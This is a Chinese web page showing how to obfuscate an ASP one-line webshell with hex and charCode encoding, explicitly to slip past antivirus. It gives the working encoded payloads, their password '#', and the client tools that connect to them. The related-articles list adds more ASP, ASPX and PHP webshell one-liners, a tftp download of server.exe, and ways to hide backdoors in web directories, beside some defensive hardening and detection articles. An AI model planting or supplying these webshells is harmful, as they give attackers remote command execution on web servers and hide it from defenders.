更牛的一句话asp木马加密(去掉asp里的%)

不知道怎样表达清楚。看例子吧:


代码如下:

<script language=vbs runat=server>  
Execute(HextoStr("65786563757465287265717565737428636872283335292929")) 
Function HextoStr(data) 
HextoStr="EXECUTE """"" 
C="&CHR(&H" 
N=")" 
Do While Len(data)>1 
If IsNumeric(Left(data,1)) Then 
HextoStr=HextoStr&C&Left(data,2)&N 
data=Mid(data,3) 
Else 
HextoStr=HextoStr&C&Left(data,4)&N 
data=Mid(data,5) 
End If 
Loop 
End Function 
</script>  
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode( 
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,1 
04,40,101,41,123,125))</SCRIPt>

不过加密后就不是一句话了,哈哈。这个s端用海阳或冰狐都可以连得上的,密码是#。

其实只是换写了<script language=vbs runat=server> 这种方式,里边的代码可以用js或vbs等多种加密方式来加密解密了,省得asp只有微软
的那个东东可以加密,同时省去了asp里的%号而已。当然不加密也可以,调用<script language=vbs runat=server>那还是一句话,加密主要
是为了躲过杀毒软件。

(0)

相关推荐

  • 一句话 asp木马加密版 彻底突破杀毒软件

    不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server>  Execute(HextoStr("65786563757465287265717565737428636872283335292929"))  Function HextoStr(data)  HextoStr="EXECUTE """""  C="&CHR(&H

  • asp一句话木马原理分析

    通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候,不出现" 编译错误,缺少脚本关闭标志%>" 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get server.exe 一句话木马<%execute request("a")%>的原理: 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们

  • asp.net jscript 一句话木马

    min.aspx 复制代码 代码如下: <%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%> 复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/x

  • aspx超强木马查杀与防范(web网马)

    复制代码 代码如下: <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%><%@ import Namespace="System.IO"%><

  • asp,php一句话木马整理方便查找木马

    特把经常用到的网页后门的木马整理下,如果不全请大家补全他,大家在网站混口饭吃,都不容易何必呢 asp一句话木马 文件常见内容 <%If Request("#")<>"" Then Execute(Request("#"))%> execute(request("#")); eval(request("#")); php一句话木马 <?@include($_POST["

  • 有效防止ASP木马上传运行—小知识[网络安全技术]

    一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一 前使用IIS服务器的站长很多,特别是对于ASP网站来说,防止ASP木马成了网站安全最关键的内容. 一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一定程度上有效防止ASP木马的入侵 一.使用FileSystemObject组件 FileSystemObject可以对文件进行常规操作 可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scr

  • ASP下检测图片木马的函数代码

    木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变),然后通过网站提供的文件上传功能上传这一张"合 '法的"图片,进而实现了上传ASP木马的目的. ' 防范方法:因为这种木马是图片与木马的二合一,所以需要在上传图片前检查文件内容,若文件内容不合法(即包含有恶意代码在里面), '则禁止上传,从而堵住了木马攻击的源头,这是木马攻击的第

  • 如何防范ASP木马

    修改三个组件来达到防asp木马攻击.FileSystemObject组件---对文件进行常规操作.WScript.Shell组件---可以调用系统内核运行DOS命令.Shell.Application组件--可以调用系统内核运行DOS命令. 一.使用FileSystemObject组件 1.可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_

  • 一款不错的asp木马 黑色界面

    <% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617"                           '密码 mName="BY:.尐飛"           '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责"       '版权 Server.ScriptTimeout=9

  • 隐藏ASP木马后门的两种方法

    1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

  • 防范ASP木马的十大基本原则强列建议看下

    由于ASP它本身是服务器提供的一项服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁.因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求. 几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇到过网页被篡改.数据被删除的经历,事后除了对这种行径深恶痛绝外,许多客户又苦于没有行之有效的防范措施.鉴于大部

  • 一句话木马的原理及利用分析(asp,aspx,php,jsp)

    一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("

  • ASP防止图片木马上传的代码

    ASP木马防御: 复制代码 代码如下: const adTypeBinary=1 dim jpg(1):jpg(0)=CByte(&HFF):jpg(1)=CByte(&HD8) dim bmp(1):bmp(0)=CByte(&H42):bmp(1)=CByte(&H4D) dim png(3):png(0)=CByte(&H89):png(1)=CByte(&H50):png(2)=CByte(&H4E):png(3)=CByte(&H4

随机推荐